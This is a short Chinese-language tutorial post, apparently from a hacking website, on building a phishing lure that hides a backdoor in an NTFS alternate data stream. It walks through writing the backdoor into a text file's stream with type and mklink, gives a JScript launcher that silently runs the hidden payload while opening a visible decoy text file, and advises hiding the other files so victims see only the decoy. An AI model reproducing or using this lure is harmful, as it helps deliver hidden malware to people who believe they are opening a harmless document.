制作ADS流文件进行钓鱼-华盟网

制作ADS流文件进行钓鱼

华盟学院山东省第二期线下学习计划

大家好,我是Alex。今天教大家制作ADS流文件钓鱼,在windows下就可以完成了。随着杀毒软件功能的日益强大,病毒总会借助各式各样的隐藏手段来逃避杀毒软件的“追捕”。有些病毒会通过设置文件属性来隐藏自身,从而长期伏在计算机中,使自己很难被用户发现。一种更为隐蔽、危害性更大的隐藏方法逐渐被病毒利用,即利用NTFS数据流来隐藏病毒,此类病毒我们称之为ADS流病毒或ZeroAcess。

我们把后门放在文件夹下,并且新建一个txt文档

打开cmd使用type命令重定向,将程序写入文件流

使用mklink命令创建文件链接

然后新建一个用于显示的txt文档

最后,写一个JS文件

var objShell = newActiveXObject("shell.application");

objShell.ShellExecute("cmd.exe","/c alex.txt", "", "open", 0);

objShell.ShellExecute("2.txt","", "", "open", 1);

咱们执行一下!

(o゜▽゜)o☆[BINGO!]

PS:大家可以把除去显示的txt文档外其余所有文件隐藏,然后放入一个主程序

www.idc126.com

本文由 华盟网 作者:congtou 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
1

发表评论